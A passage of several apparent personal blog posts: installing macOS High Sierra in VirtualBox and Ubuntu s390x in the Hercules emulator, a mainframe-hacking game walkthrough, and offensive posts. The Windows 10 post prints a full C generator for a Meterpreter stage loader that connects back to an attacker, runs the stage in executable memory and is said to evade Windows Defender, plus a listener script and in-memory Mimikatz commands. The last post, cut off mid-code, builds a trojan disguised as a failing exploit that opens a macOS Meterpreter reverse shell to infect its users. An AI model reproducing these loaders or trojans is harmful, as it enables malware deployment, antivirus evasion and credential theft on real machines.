Channel: Astr0baby's not so random thoughts _____ rand() % 100;

Installing High Sierra 10.13.4 in VirtualBox 5.x


A short post that might help somebody struggling to install the latest macOS in VirtualBox on Linux. I'm running VirtualBox 5.2.10 on x86_64 Linux. The process below can be replicated on Windows as well, but the networking part at the end will of course be different.

So let's first get the macOS 10.13.4 ISO (you can get the DMG and convert it to an ISO, but I have little disk space now and just used a ready-made ISO from the link below)

https://bit.ly/DownloadMacOSHS10134

Extract the RAR and set up the new VM as follows in VirtualBox

Networking and other options are pretty straightforward. Attach the extracted ISO as your boot media, and before the first boot set the following from a terminal (the CPUID spoof and the SMC/DMI strings are what make the VM look like a real Mac to Apple's installer):

$ VBoxManage modifyvm "High Sierra" --cpuidset 00000001 000106e5 00100800 0098e3fd bfebfbff
$ VBoxManage setextradata "High Sierra" "VBoxInternal/Devices/efi/0/Config/DmiSystemProduct" "iMac11,3"
$ VBoxManage setextradata "High Sierra" "VBoxInternal/Devices/efi/0/Config/DmiSystemVersion" "1.0"
$ VBoxManage setextradata "High Sierra" "VBoxInternal/Devices/efi/0/Config/DmiBoardProduct" "Iloveapple"
$ VBoxManage setextradata "High Sierra" "VBoxInternal/Devices/smc/0/Config/DeviceKey" "ourhardworkbythesewordsguardedpleasedontsteal(c)AppleComputerInc"
$ VBoxManage setextradata "High Sierra" "VBoxInternal/Devices/smc/0/Config/GetKeyFromRealSMC" 1
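The same VM definition can be done entirely from the shell, so the guest can be rebuilt reproducibly and the CPUID and SMC/DMI tweaks are never forgotten. This is an added example, not a script from the original post: the VirtualBox OS type name (MacOS1013_64), the RAM, CPU and disk sizes and the SATA layout are my assumptions (check `VBoxManage list ostypes` on your build); the CPUID leaf and the extradata keys are the ones from the post. DRY_RUN=1 prints the commands instead of running them.

```shell
#!/bin/sh
# build-macos-vm.sh: script the VirtualBox guest definition for the High Sierra installer.
# Added example, not part of the original post. OS type, RAM, CPUs and disk size are
# assumptions; the CPUID leaf and SMC/DMI strings are the ones from the post.
set -eu

# DRY_RUN=1 prints each VBoxManage command instead of executing it
run() {
    if [ "${DRY_RUN:-0}" = 1 ]; then
        printf '%s\n' "$*"
    else
        "$@"
    fi
}

# build_macos_vm NAME ISO [DISK.vdi]
build_macos_vm() {
    vm="$1"
    iso="$2"
    disk="${3:-$HOME/VirtualBox VMs/$vm/$vm.vdi}"

    run VBoxManage createvm --name "$vm" --ostype MacOS1013_64 --register
    # ICH9 chipset and EFI firmware are what the Apple installer expects
    run VBoxManage modifyvm "$vm" --memory 4096 --cpus 2 --vram 128 \
        --chipset ich9 --firmware efi
    # 64 GB dynamically allocated system disk plus the installer ISO on one SATA controller
    run VBoxManage createmedium disk --filename "$disk" --size 65536 --format VDI
    run VBoxManage storagectl "$vm" --name SATA --add sata --controller IntelAhci
    run VBoxManage storageattach "$vm" --storagectl SATA --port 0 --device 0 \
        --type hdd --medium "$disk"
    run VBoxManage storageattach "$vm" --storagectl SATA --port 1 --device 0 \
        --type dvddrive --medium "$iso"
    # CPUID leaf 1 spoof plus the SMC/DMI keys from the post
    run VBoxManage modifyvm "$vm" --cpuidset 00000001 000106e5 00100800 0098e3fd bfebfbff
    run VBoxManage setextradata "$vm" "VBoxInternal/Devices/efi/0/Config/DmiSystemProduct" "iMac11,3"
    run VBoxManage setextradata "$vm" "VBoxInternal/Devices/efi/0/Config/DmiSystemVersion" "1.0"
    run VBoxManage setextradata "$vm" "VBoxInternal/Devices/efi/0/Config/DmiBoardProduct" "Iloveapple"
    run VBoxManage setextradata "$vm" "VBoxInternal/Devices/smc/0/Config/DeviceKey" \
        "ourhardworkbythesewordsguardedpleasedontsteal(c)AppleComputerInc"
    run VBoxManage setextradata "$vm" "VBoxInternal/Devices/smc/0/Config/GetKeyFromRealSMC" 1
}

# count_vbox_commands NAME ISO: number of VBoxManage invocations the build would issue
count_vbox_commands() {
    ( DRY_RUN=1; build_macos_vm "$1" "$2" /tmp/dry.vdi ) | grep -c '^VBoxManage '
}

# Usage: sh build-macos-vm.sh "High Sierra" /path/to/HighSierra.iso
[ $# -lt 2 ] || build_macos_vm "$@"
```

Run it once with DRY_RUN=1 to review the twelve commands it will issue, then without it; after the first boot detach the ISO with `storageattach ... --port 1 --medium none` (same flags as above) before the EFI shell step described below.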

Now boot the VM and the macOS installer will come up after some time.

Set up the disk first, before installing, via Disk Utility (erasing the disk works best if you don't care about the defaults).

Exit Disk Utility and install macOS. This takes approx. 10 minutes and then the VM suddenly reboots (for me this happens at about 2 minutes remaining).

If you don't do anything the VM will reboot back into the installer, which we do not want. If that happens, simply power off the VM and remove the installation ISO. When you boot the VM again you get dropped to an EFI shell. Enter the following commands to continue:

Shell> fs1:
FS1:\> cd "macOS Install Data"
FS1:\macOS Install Data\> cd "Locked Files"
FS1:\macOS Install Data\Locked Files\> cd "Boot Files"
FS1:\macOS Install Data\Locked Files\Boot Files\> boot.efi

This boots the installer's second stage and this time the setup finishes properly, but it takes considerably more time than the first run.

And after some time you should have the new macOS 10.13.4 High Sierra ready in your VirtualBox.

For networking I use the following script so the VirtualBox VM can talk to the host, to other VMs and to the Internet (run it as root):

#!/bin/bash
# Setup tap and bridge: br0 joins the wired NIC, VirtualBox's host-only interface
# (vboxnet0) and a tap device; traffic leaves through wlan0 with NAT.
tunctl -t tap0 -u user
ifconfig tap0 up
brctl addbr br0
brctl addif br0 eth0 vboxnet0
brctl setfd br0 0
ifconfig eth0 10.0.2.1 up
ifconfig br0 10.0.2.2 netmask 255.255.255.0 broadcast 10.0.2.255 up
# vboxnet0 is already a bridge member; only tap0 is added here
brctl addif br0 tap0
ifconfig tap0 0.0.0.0
sysctl net.ipv4.ip_forward=1
iptables -A FORWARD --in-interface eth0 -j ACCEPT
iptables --table nat -A POSTROUTING --out-interface wlan0 -j MASQUERADE

The VM's network adapter is set as follows:

And the network configuration inside the macOS VM is static, as follows:



Windows 10 May 2018 Updates – Mimikatz and Kekeo


First of all, kudos to @gentilkiwi for Mimikatz and Kekeo. I have used Mimikatz since 2012, when I learned of its existence and first tried it.

Recently I stumbled across the following tweet and wondered how the newest Windows 10 release (10.0.17134.48) behaves when the below executes

The above uses some obfuscation to rename various PowerShell functions in the notorious Invoke-Mimikatz.ps1 from PowerShellMafia's PowerSploit (https://github.com/PowerShellMafia/PowerSploit), specifically https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1

I have played a little with the above in the past and have described my modifications here (https://astr0baby.wordpress.com/2017/03/28/mimikatz-2-1-1-powershell-generator/)

In early 2018 Windows Defender started to pick the above up. So I fired up the VM again, updated it with the latest patches and performed the tests below to see if the PowerShell method still works.

It seems that it does not anymore.

So again the only way I could get the latest Mimikatz to run on Windows 10 was via a Meterpreter session from a custom payload executable (which bypasses Windows Defender), built with the generator below:

#!/bin/bash
clear
echo "****************************************************************"
echo " Automatic C source code generator - FOR METASPLOIT "
echo " Based on rsmudge metasploit-loader "
echo " PE32+ executable (GUI) x86-64 "
echo "****************************************************************"
echo -en 'Metasploit server IP : '
read -r ip
echo -en 'Metasploit port number : '
read -r port

# Embed the handler address and port as string literals, then append the loader body
{
printf '#include <stdio.h>\n#include <stdlib.h>\n#include <winsock2.h>\n#include <windows.h>\n'
printf 'unsigned char lambert[]="%s";\nunsigned char omega[]="%s";\n' "$ip" "$port"
cat <<'EOF'
void winsock_init() {
    WSADATA wsaData;
    WORD wVersionRequested = MAKEWORD(2, 2);
    if (WSAStartup(wVersionRequested, &wsaData) < 0) {
        printf("bad\n");
        WSACleanup();
        exit(1);
    }
}
void punt(SOCKET my_socket, char *error) {
    printf("r %s\n", error);
    closesocket(my_socket);
    WSACleanup();
    exit(1);
}
/* Read exactly len bytes; give up on a socket error or a closed connection */
int recv_all(SOCKET my_socket, void *buffer, int len) {
    int tret = 0;
    int nret = 0;
    char *startb = (char *)buffer;
    while (tret < len) {
        nret = recv(my_socket, startb, len - tret, 0);
        if (nret == SOCKET_ERROR || nret == 0)
            punt(my_socket, "no data");
        startb += nret;
        tret += nret;
    }
    return tret;
}
SOCKET wsconnect(char *targetip, int port) {
    struct hostent *target;
    struct sockaddr_in sock;
    SOCKET my_socket;
    my_socket = socket(AF_INET, SOCK_STREAM, 0);
    if (my_socket == INVALID_SOCKET)
        punt(my_socket, ".");
    target = gethostbyname(targetip);
    if (target == NULL)
        punt(my_socket, "..");
    memcpy(&sock.sin_addr.s_addr, target->h_addr, target->h_length);
    sock.sin_family = AF_INET;
    sock.sin_port = htons(port);
    if (connect(my_socket, (struct sockaddr *)&sock, sizeof(sock)))
        punt(my_socket, "...");
    return my_socket;
}
int main(int argc, char *argv[]) {
    FreeConsole();
    Sleep(15);
    ULONG32 size;
    char *buffer;
    void (*function)();
    winsock_init();
    SOCKET my_socket = wsconnect(lambert, atoi(omega));
    /* The multi/handler first sends the stage length as a 4-byte little-endian integer */
    int count = recv(my_socket, (char *)&size, 4, 0);
    if (count != 4 || size == 0)
        punt(my_socket, "error length\n");
    buffer = VirtualAlloc(0, size + 5, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if (buffer == NULL)
        punt(my_socket, "error in buf\n");
    /* Prefix the stage with "mov edi, <socket>" (0xBF imm32; low 32 bits of the
       SOCKET handle) so the Meterpreter stage reuses this connection */
    buffer[0] = 0xBF;
    memcpy(buffer + 1, &my_socket, 4);
    count = recv_all(my_socket, buffer + 5, size);
    function = (void (*)())buffer;
    function();
    return 0;
}
EOF
} > temp.c
echo '(+) Compiling binary ..'
x86_64-w64-mingw32-gcc temp.c -o payload.exe -lws2_32 -mwindows
ls -la temp.c
#strip payload.exe
file=$(ls -la payload.exe) ; echo '(+)' "$file"

And the Listener for the above :

#!/bin/bash
clear
echo "***************************************************************"
echo "      Automatic Listener generator - FOR METASPLOIT "
echo "***************************************************************"
echo -e "What IP are we gonna listen to ? \c"
read -r host
echo -e "What Port Number are we gonna listen to? : \c"
read -r port
echo "Starting the meterpreter listener.."
# Write a one-line wrapper so the same handler can be restarted later without retyping
echo "./msfconsole -x \"use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_tcp; set LHOST $host; set LPORT $port; run\"" > run.listener.sh
chmod +x run.listener.sh
./run.listener.sh

We can still get reliable execution and in-memory injection via Meterpreter's execute -m (run the uploaded executable from memory, under the decoy process name given with -d):

meterpreter> execute -H -i -c -f /home/user/metasploit-framework/mimikatz.exe -m -d calc.exe

And speaking of Kekeo (not many people run it, so I decided to include it in my tests), here we run it against the latest patched Windows 10:

meterpreter> execute -H -i -c -f /home/user/metasploit-framework/kekeo.exe -m -d calc.exe



Mainframe Hacking CYOA


I had a great time playing through the amazing game created by Phil Young (Soldier of Fortran, @mainframed767). What makes this project amazing is that it was written in HyperCard 2.4 and runs only on old Apple Macintosh systems (System 7.0.1), as seen in the screenshot below. So getting into it requires the dedication a "hacker" should have. The idea is brilliant and introduces people to the concept of mainframe hacking (many people don't even know what mainframes were, or are).

The game can be played online via Archive.org's emulation here https://archive.org/details/MainframeHackingCYOA or locally if you download the disk images from Archive.org:

https://archive.org/download/MainframeHackingCYOA/HyperCardBootSystem7.img
https://archive.org/download/MainframeHackingCYOA/MainframeHacker.img

You can use minivmac (https://github.com/jsdf/minivmac) or PCE (http://www.hampa.ch/pce/download.html); both work fine for MainframeHackingCYOA. I have managed to run the game on a simulated Alpha DS25 via alphavm and on a MIPS CI20 development board (running the retro CDE).

Since we got this far I wanted to take the opportunity to describe my experience during the gameplay and show some interesting points this game makes. Again, big thanks to Soldier of Fortran for this gem!

We start the game simply by being curious. I recommend going through this yourself before reading on.

And enter the Cyberspace

Who would not like to pick up a phone like the Matrix dudes did  ?

OPSEC at its best

Let's dial in, no time for bed

Honestly who remembers the BBS days ? Seems like eons ago.

If you are using a non Macintosh keyboard, the zxcvbnm,./ keys are shifted by one to the right.

So we check what is available for reading

Interesting, E Corp... and the logo :) Mr. Robot style :) and a password, ECorp@18, but no username...

And here are the instructions from the SYSOP what to do.

So off we go to Connect

Now this is quite informative. Nmap, Metasploit and Hydra are daily bread to any security researcher, but c3270 (a curses-based IBM 3270 host access tool, http://x3270.bgp.nu/download.html) not so much.

So we first run an nmap scan and probe open ports to determine service/version info and start hacking…

Here we learn briefly about TSO, CICS and the VTAM on the Mainframes and the corresponding nmap NSE scripts that can be used for enumeration. Lets check that telnet port first …

So we ran the VTAM enumeration against the telnet port 23 we found earlier and learned about the TSOPRD, TSODEV, CICSPRD1 and CICSPRD2 applids. We can use this information to enumerate CICS on the mainframe, as seen below. Remember that we have a password from the leaked E Corp document on the BBS (ECorp@18), so we use it for the CICS enumeration here. Let's query TSODEV and see what information comes out.

To get a list of valid usernames we brute-force FTP with Hydra, using the known password (ECorp@18):

So here we get a list of valid users: x003, x888 and x420. OK, we have gathered enough information to get to the final stage, attacking TSO and CICS.

Now if you get lucky and choose a privileged user from the above you can finish the game quickly. x420 looks like it must have some weight... what I did, however, was use x003 and the TSO attack.

Before we escalate privileges, let's search the Warnings.

SYS1.PARMLIB is in WARN mode... hmm... what does a search for BPX.* reveal?

Not many rights there, so let's see what we get from SURROGAT.

I knew it, x420 must have some higher powers. So we try the last possibility here, APF Authorized.

Escalate privileges... (man, I wish hacking was this easy...)

But I got stuck here... maybe I did something wrong... but there was no way to go back from this screen and I suspect it to be a deadlock. The only option at this point was to reload the simulation and start over. Since I already had the info that x420 would be the superuser, I went straight into attacking CICS -> starting over.

And skipping to the CICS part... this time we use the x420 user and the ECorp@18 creds.

Heh... another user, x525... let's see what CICSpwn brings.

Reverse shell: nothing...

Bind shell gets through.

And sending the result.

Thank you @mainframed767  this was fun to play through (a little tricky with the keyboard shift… but fun)

So we have learned a few things here... time to study the tooling behind it in ayoul3's repositories (github.com/ayoul3):

https://github.com/ayoul3/cicspwn 
https://github.com/ayoul3/Privesc
https://github.com/ayoul3/Rexx_scripts
https://github.com/ayoul3/JCL_scripts
https://github.com/ayoul3/wc3270_hacked

Here are the @mainframed767  Youtube resources about Mainframe security

And maybe start learning from scratch using Hercules https://github.com/hercules-390/hyperion


Installing Ubuntu 18.04 Server s390x in Hercules Mainframe simulator


Honestly I had very little interest in IBM Z mainframe computers (zEC12 and up) (https://en.wikipedia.org/wiki/IBM_zEC12_(microprocessor)), but recently mainframes caught my interest (thanks to Soldier of FORTRAN @mainframed767 https://mainframed767.tumblr.com/)

So let's see if we can run mainframe Ubuntu on a laptop running an x86_64 Linux distribution (Mint 18.3). We will need a couple of things to prepare the environment before we move on to the simulation.

First let's download the Ubuntu installation media for the s390x architecture from here https://wiki.ubuntu.com/S390X#Downloads

The first interesting thing is the statement that Ubuntu s390x cannot be run in, and is not supported on, simulators like Hercules, which we will prove wrong in the next steps.

After filling up some registration details you will get to the download link or just grab directly from here http://cdimage.ubuntu.com/releases/18.04/release/ubuntu-18.04-server-s390x.iso

Next we will need to download and compile Hercules from https://github.com/hercules-390/hyperion You will need all the standard Linux build tools (build-essential, cmake and a few -dev packages that the cmake will report that its missing) All this is available on the standard Linux Mint 18.3 apt repositories.

Let's create a working environment for this in our home dir
==========================================================

$ mkdir -p ~/MAINFRAME/
$ cd ~/MAINFRAME
$ git clone https://github.com/hercules-390/hyperion
$ cd hyperion
$ mkdir build
$ cd build
$ cmake ..

If all dependencies were met the following will be visible 
-------------------------------------------------------------------
Install prefix /usr/local
Executable directory bin
Library directory lib
Modules directory lib
Data Directory (http) /usr/local/share/Hercules
Source directory /home/user/MAINFRAME-STUFF/hyperion
Build directory /home/user/MAINFRAME-STUFF/hyperion/build
Generator: Unix Makefiles
Build command line: /usr/bin/make
C compiler version: GNU 5.4.0
C options (Release): -DHAVE_CONFIG_H -g3 -ggdb3 -DNDEBUG -O2 -march=native -minline-stringops-dynamically
C options (Debug): -DHAVE_CONFIG_H -g3 -ggdb3 -g
Install RPATH: $ORIGIN/../lib
Large file support: Using native large file support.
Hercules link libs: m;dl
Target processor: x86_64
-------------------------------------------------------------------

$ make 
$ sudo su 
# make install

Prepare the directory structure for the Ubuntu Hercules simulation

$ mkdir -p ~/MAINFRAME/ubuntu/dasd
$ cd ~/MAINFRAME/ubuntu/dasd
$ dasdinit -lfs -linux ubuntu.disk 3390-3 LIN120

This creates a 2.8 GB disk (the 3390-3 default of 3339 cylinders). If you need more, append the number of cylinders to the command; 8000 cylinders gives a 6.8 GB disk:

$ dasdinit -lfs -linux ubuntu.disk 3390-3 LIN120 8000

Alternatively, if you want to save disk space at the expense of some run-time overhead, you can use zlib or bzip2 compressed DASD images by adding the -z or -bz2 option respectively. For example:

$ dasdinit -z -lfs -linux ubuntu.disk 3390-3 LIN120

Next we need to prepare the Ubuntu s390x hercules.cnf configuration file

$ cd ~/MAINFRAME/ubuntu
$ vi hercules.cnf

I have observed that the Debian 9.4 hercules.cnf does not work with Ubuntu 18.04

CPUSERIAL 002623
CPUMODEL 2086
MAINSIZE 2048 
XPNDSIZE 2048
NUMCPU 2 
MAXCPU 2 
OSTAILOR LINUX
PANRATE SLOW
ARCHMODE ESAME

# Display Terminals

0700 3270
0701 3270


# dasd
0120 3390 ./dasd/debian.disk
# network
0A00,0A01 CTCI -n /dev/net/tun -t 1500 192.168.11.100 192.168.11.4

So if you try to use the above, Hercules will complain when loading the Ubuntu config.

So use the configuration below for your hercules.cnf (this is important since the sample configuration from Debian won't work). Adjust the number of CPUs to match your system; I have used 4 CPUs here (NUMCPU 4).

ARCHMODE z/Arch
ALRF ENABLE
CCKD RA=2,RAQ=4,RAT=2,WR=2,GCINT=5,GCPARM=0,NOSTRESS=0,TRACE=0,FREEPEND=-1
CNSLPORT 3270
CONKPALV (3,1,10)
CPUMODEL 3090
CPUSERIAL 012345
DIAG8CMD ENABLE
ECPSVM YES
LOADPARM 0A95DB..
LPARNAME HERCULES
MAINSIZE 1024
MOUNTED_TAPE_REINIT DISALLOW
NUMCPU 4
OSTAILOR Z/OS
PANRATE 80
PGMPRDOS LICENSED
SHCMDOPT NODIAG8
SYSEPOCH 1900
TIMERINT 50
TZOFFSET +1400
YROFFSET 0

# Display Terminals

0700 3270
0701 3270

# dasd
0120 3390 ./dasd/ubuntu.disk

# network
0A00,0A01 CTCI -n /dev/net/tun -t 1500 192.168.11.100 192.168.11.4

I am using my network configuration (yours will probably be different, so adjust it to your needs). A short explanation of the #network definition above:

192.168.11.100 is the tun endpoint of the virtual Ubuntu s390x inside Hercules
192.168.11.4   is an IP address I have assigned to my wireless interface wlp9s0
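The dasdinit sizing and the hercules.cnf above are the two places where a typo costs an hour of installation time (a DASD that turns out too small, or a config that still points at debian.disk). The script below is an added example, not from the original post: it computes the uncompressed image size from the 3390 geometry (15 heads per cylinder, 56832 bytes per track, which is exactly what Hercules reports for ubuntu.disk at start-up), checks free space, and writes the config from a few variables. The per-model default cylinder counts are dasdinit's defaults; the directory layout and IPs are the ones from this post.

```shell
#!/bin/sh
# prepare-hercules.sh: size the 3390 DASD before creating it and write hercules.cnf from
# a handful of variables. Added example, not part of the original post.
# 3390 geometry is fixed: 15 heads per cylinder and 56832 bytes per track, matching the
# "cyls 3339 heads 15 tracks 50085 trklen 56832" line Hercules prints for ubuntu.disk.
# Default cylinder counts per model are the dasdinit defaults; a trailing number on the
# dasdinit command line overrides them.
set -eu

dasd_default_cyls() {
    case "$1" in
        3390-1) echo 1113 ;;
        3390-2) echo 2226 ;;
        3390-3) echo 3339 ;;
        3390-9) echo 10017 ;;
        *) echo "unknown device type $1" >&2; return 1 ;;
    esac
}

# dasd_bytes MODEL [CYLS]: uncompressed image size in bytes (-z/-bz2 images start small and grow)
dasd_bytes() {
    cyls="${2:-$(dasd_default_cyls "$1")}" || return 1
    echo $((cyls * 15 * 56832))
}

# dasd_gb MODEL [CYLS]: the same size in decimal gigabytes with one decimal place
dasd_gb() {
    bytes=$(dasd_bytes "$@") || return 1
    printf '%d.%d\n' $((bytes / 1000000000)) $(((bytes / 100000000) % 10))
}

# check_space DIR MODEL [CYLS]: succeed only if DIR has room for the uncompressed image
check_space() {
    dir="$1"; shift
    need=$(dasd_bytes "$@") || return 1
    avail_kb=$(df -Pk "$dir" | awk 'NR == 2 { print $4 }')
    [ $((avail_kb * 1024)) -ge "$need" ]
}

# write_hercules_cnf OUT DISK NUMCPU MAINSIZE_MB GUEST_IP HOST_IP
write_hercules_cnf() {
    out="$1"; disk="$2"; ncpu="$3"; mainsize="$4"; guest="$5"; host="$6"
    cat > "$out" <<EOF
ARCHMODE z/Arch
ALRF ENABLE
CCKD RA=2,RAQ=4,RAT=2,WR=2,GCINT=5,GCPARM=0,NOSTRESS=0,TRACE=0,FREEPEND=-1
CNSLPORT 3270
CONKPALV (3,1,10)
CPUMODEL 3090
CPUSERIAL 012345
DIAG8CMD ENABLE
ECPSVM YES
LOADPARM 0A95DB..
LPARNAME HERCULES
MAINSIZE $mainsize
MOUNTED_TAPE_REINIT DISALLOW
NUMCPU $ncpu
OSTAILOR Z/OS
PANRATE 80
PGMPRDOS LICENSED
SHCMDOPT NODIAG8
SYSEPOCH 1900
TIMERINT 50
TZOFFSET +1400
YROFFSET 0

# Display Terminals
0700 3270
0701 3270

# dasd
0120 3390 $disk

# network: guest tun endpoint first, then the host-side address
0A00,0A01 CTCI -n /dev/net/tun -t 1500 $guest $host
EOF
}

# Usage: PREPARE=1 sh prepare-hercules.sh ~/MAINFRAME/ubuntu [CYLS]
if [ "${PREPARE:-0}" = 1 ]; then
    base="$1"; cyls="${2:-}"
    mkdir -p "$base/dasd"
    echo "ubuntu.disk will be $(dasd_gb 3390-3 $cyls) GB uncompressed"
    check_space "$base/dasd" 3390-3 $cyls || { echo "not enough free space in $base/dasd" >&2; exit 1; }
    (cd "$base/dasd" && dasdinit -lfs -linux ubuntu.disk 3390-3 LIN120 $cyls)
    write_hercules_cnf "$base/hercules.cnf" ./dasd/ubuntu.disk 4 1024 192.168.11.100 192.168.11.4
fi
```

`dasd_gb 3390-3` prints 2.8 and `dasd_gb 3390-3 8000` prints 6.8, the two figures quoted above; the DASD path in the generated config is relative, so Hercules must be started from the directory that contains hercules.cnf, as in the steps that follow.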

And create a networking script to run before starting Hercules so that we can use the network inside the simulator. I have called it network.sh

$ vi ~/MAINFRAME/ubuntu/network.sh

And enter the following.

#!/bin/bash
# Depending on your system replace the following interface names:
#   enp0s25 = eth0 (wired)
#   wlp9s0  = wlan0 (wireless, the uplink that gets NATed)
# Hercules creates its own tun0 for the CTCI device when it starts; the tap0/br0 part
# below is the same bridge as in the VirtualBox post and is not needed by the CTCI link.
# Setup tap and bridge
tunctl -t tap0 -u user
ifconfig tap0 up
brctl addbr br0
brctl addif br0 enp0s25
brctl setfd br0 0
ifconfig enp0s25 10.0.2.1 up
ifconfig br0 10.0.2.2 netmask 255.255.255.0 broadcast 10.0.2.255 up
brctl addif br0 tap0
ifconfig tap0 0.0.0.0
# Forward and masquerade so the guest (192.168.11.100 behind tun0) reaches the Internet
sysctl net.ipv4.ip_forward=1
iptables -A FORWARD --in-interface enp0s25 -j ACCEPT
iptables --table nat -A POSTROUTING --out-interface wlp9s0 -j MASQUERADE

Execute the above network.sh script (you need root privs) before starting the Hercules simulator.

$ sudo su 
# ./network.sh

Mount the downloaded Ubuntu server ISO

# mount -o loop /path/to/iso/ubuntu-18.04-server-s390x.iso /mnt

And start Hercules with the Ubuntu config

$ cd ~/MAINFRAME/ubuntu
$ sudo su
# hercules -f hercules.cnf

You should see something similar to this:

HHC00346I gcparm=0,nostress=0,freepend=-1,fsync=0,linuxnull=0,trace=0
HHC02204I conkpalv set to (3,1,10)
HHC02204I cpumodel set to 3090
HHC02204I cpuserial set to 012345
HHC02204I ecpsvm set to enabled, trap support enabled
HHC02204I loadparm set to 0A95DB..
HHC02204I lparname set to HERCULES
HHC17003I MAIN storage is 1G (mainsize); storage is not locked
HHC02204I mounted_tape_reinit set to disabled
HHC00109I Thread CPU Time is available; _POSIX_THREAD_CPUTIME=0
HHC00100I Thread id 00007f1d0fb69700, prio 15, name Processor CP01 started
HHC00811I Processor CP01: architecture mode z/Arch
HHC00109I Thread CPU Time is available; _POSIX_THREAD_CPUTIME=0
HHC00100I Thread id 00007f1d0fa68700, prio 15, name Processor CP02 started
HHC00811I Processor CP02: architecture mode z/Arch
HHC00109I Thread CPU Time is available; _POSIX_THREAD_CPUTIME=0
HHC00100I Thread id 00007f1d0f764700, prio 15, name Processor CP03 started
HHC00811I Processor CP03: architecture mode z/Arch
HHC02204I numcpu set to 4
HHC02204I panrate set to 80
HHC02204I shcmdopt set to Enabled NoDiag8
HHC02204I timerint set to 50
HHC02204I tzoffset set to +1400
HHC02204I yroffset set to 0
HHC00100I Thread id 00007f1d0f452700, prio 4, name Console connection started
HHC00414I 0:0120 CKD file ./dasd/ubuntu.disk: cyls 3339 heads 15 tracks 50085 trklen 56832
HHC01024I Waiting for console connections on port 3270
HHC00901I 0:0A00 CTCI: Interface tun0 type TUN opened
HHC00100I Thread id 00007f1d12623740, prio 0, name Control panel started
herc =====>

The herc =====> prompt is important; this is our mainframe console prompt, which we will now use inside Hercules to drive the Ubuntu installer.

Type the following to load the installer from our mounted iso.

herc =====> ipl /mnt/ubuntu.ins

After approx 90 seconds the installation will load and we get to the first step of the S390X configuration – Network

What is very important here is how to type input for the guest at the herc prompt: always prefix it with a dot (.), which sends the line to the guest's console instead of to Hercules itself. We want to use CTC (channel-to-channel) networking here:

herc =====> .1 and hit ENTER

Now you have to define the end-points for this virtual network interface. Select the CTC read device: herc =====> .1 and hit ENTER

Now choose the CTC write device: herc =====> .2 and hit ENTER

We do not want to use DHCP, so: herc =====> .2 and hit ENTER

Enter the guest IP: herc =====> .192.168.11.100 and hit ENTER

Next define the netmask: herc =====> .255.255.255.0 and hit ENTER

Next define the gateway: herc =====> .192.168.11.1 and hit ENTER (please note that this is the actual gateway of my wireless network, so adjust accordingly)

Define the DNS server; just use Google since we are IP forwarding and masquerading anyway: herc =====> .8.8.8.8 and hit ENTER

Now name the new s390x system: herc =====> .ubuntu-framed and hit ENTER (use your imagination here)

Define the domain name (does not really matter): herc =====> .virtual and hit ENTER

Now comes the important part, the password for the installation session (yes, you will log in to the simulated s390x Ubuntu via SSH from your laptop and continue the setup from there): herc =====> .password and hit ENTER, choosing your own password.

Congratulations if you got this far, we are ready to start the actual installation !

Now ssh from your Linux machine to the simulated s390x Ubuntu, using the password you defined above

$ ssh installer@192.168.11.100

And the familiar pink/purple Ubuntu Server ncurses installer will pop up. From now on it is pretty much the standard Ubuntu installation procedure. I am not going to cover the exact steps (you can get all the juicy details from https://wiki.ubuntu.com/S390X/Installation%20In%20LPAR for example).

Don't install any X stuff, just keep it basic (OpenSSH server and Basic Ubuntu Server) and be patient; the installation can take some time (2 to 3 hours on a Core i5, 8 GB RAM Panasonic Toughbook CF-53).

*You can switch between the Hercules modes via Escape key to see the CPU details

And finally we get to the end

And the main Hercules console will look like this when the system installer shuts down

So we are now ready to boot our new Ubuntu 18.04 S390X Mainframe system !

In the Hercules console hit ESCAPE and then hit "l" and "c" to boot the new system; to get back to the console display hit ESCAPE again.

Typical display in Hercules simulator

Once you see that the Secure Shell server has started, you can ssh to your s390x server from Linux (with whichever user you defined during the Ubuntu install):

ssh user@192.168.11.100

Congratulations again! You are running mainframe Ubuntu 18.04 Linux s390x in the Hercules simulator!

I would like to thank the following source of information that helped me through the above: http://www.josefsipek.net/docs/s390-linux/hercules-s390.html


Installing High Sierra 10.13.5 in VirtualBox 5.2.12 on Linux x86_64


A little update (since I have not found a reliable way to upgrade an existing pre-10.13.5 High Sierra inside VirtualBox): follow the exact same steps as described here

https://astr0baby.wordpress.com/2018/04/22/installing-high-sierra-10-13-4-in-virtualbox-5-x/

with these exceptions:

Download the macOS 10.13.5 ISO from here -> https://drive.google.com/file/d/1_wnCdMKB4_GQM9dtA4AOHxZ21NCGFNm9/view

When you get the EFI shell prompt, follow the same steps, but this time run boot.efi only once, from the correct directory, as seen in the screenshot below.

This will install High Sierra 10.13.5.

And a fresh Xcode gcc:

Creating a fake exploit for the latest High Sierra 10.13.5


Another exercise you might find useful: the art of deception. Creating fakes. Fake exploits that exploit those who execute them. And we learn how to fork() :)

Our target is macOS 10.13.5. We will be using the Metasploit Framework and some custom C code to make the fake look like an exploit that fails (while in fact it spawns a reverse TCP Meterpreter shell :))

Here is my sample code generator (put it in the metasploit-framework path and make it executable):

#!/bin/bash
clear
echo "************************************************************"
echo " Automatic shellcode generator - FOR METASPLOIT "
echo " For OSX 64bit Antivirus bypass (Avast) "
echo " And to get Script Kiddies infected :) "
echo "************************************************************"
echo -e "What IP are we gonna use ? \c"
read -r IP
echo -e "What Port Number are we gonna listen to? : \c"
read -r port
echo '[*] Checking if metasploit msfvenom is present..'
if [ -x ./msfvenom ]; then
echo '[*] Found msfvenom in current path ........ good'
else
echo '[-] No msfvenom in path...make sure you have this script in your metasploit-framework path'
exit 0
fi
echo '[*] Cleaning up '
rm -f osx64-payload.c test.c
# msfvenom writes "unsigned char buf[] = ..." as C source into test.c
./msfvenom -p osx/x64/meterpreter/reverse_tcp EXITFUNC=process LHOST="$IP" LPORT="$port" -a x64 --platform OSX -e x64/xor -f c -o test.c
{
cat <<'EOF'
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/mman.h>
EOF
cat test.c
cat <<'EOF'

/* Decoy helpers: never called, they only pad the "exploit" so it reads like real code */
void genlol();
int random_in_range(unsigned int min, unsigned int max)
{
    int base_random = rand();
    if (RAND_MAX == base_random) {
        return random_in_range(min, max);
    }
    int range = max - min,
        remainder = RAND_MAX % range,
        bucket = RAND_MAX / range;
    if (base_random < RAND_MAX - remainder) {
        return min + base_random / bucket;
    } else {
        return random_in_range(min, max);
    }
}
char *rev(char *str)
{
